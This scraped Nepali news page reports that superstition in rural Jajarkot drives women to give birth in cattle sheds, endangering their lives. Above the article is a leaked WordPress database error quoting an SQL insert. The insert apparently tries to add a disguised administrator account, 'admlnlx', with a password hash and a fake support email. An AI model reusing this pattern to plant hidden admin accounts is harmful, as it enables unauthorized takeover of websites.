WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjjOdPhJpO5Int0GP7CRFqn8UL6K601', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 08:53:37', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २ –
घरमै सुत्केरी गराउँदा देउता रिसाउने अन्धविश्वासले जाजरकोटको ग्रामीण भेगका अधिकांश सुत्केरीको ज्यान जोखिममा परेको छ ।
प्रसवपीडामा रहेका महिललाई घरमा नराखी गोठमा सुत्केरी गराउने गरिएको छ । रामीडाँडा, पैक, सक्ला, लहँ, डाँडागाउँ, रग्दा भगवतीलगायतका दुई दर्जन गाविसका महिला अझै पनि देउता रिसाउने डरले गोठमै सुत्केरी हुने गरेका छन् ।
ग्रामीण भेगमा छुट्टै गाई बाँध्ने गोठ हुँदैन । एउटै घरको माथिल्लो तलामा मानिस बस्छन् र तल्लो तलामा गाईवस्तु राख्ने गर्छन् ।
बच्चाको न्वारनपछि घरबाहिरको सबै काम गर्नुपरे पनि देउता रिसाउने डरले घरभित्र प्रवेश दिइँदैन । त्यहाँका सुत्केरीहरुले परिवारका सदस्यलाई छुन समेत पाउँदैनन् । नयाँ पत्रिका दैनिकमा खबर छ ।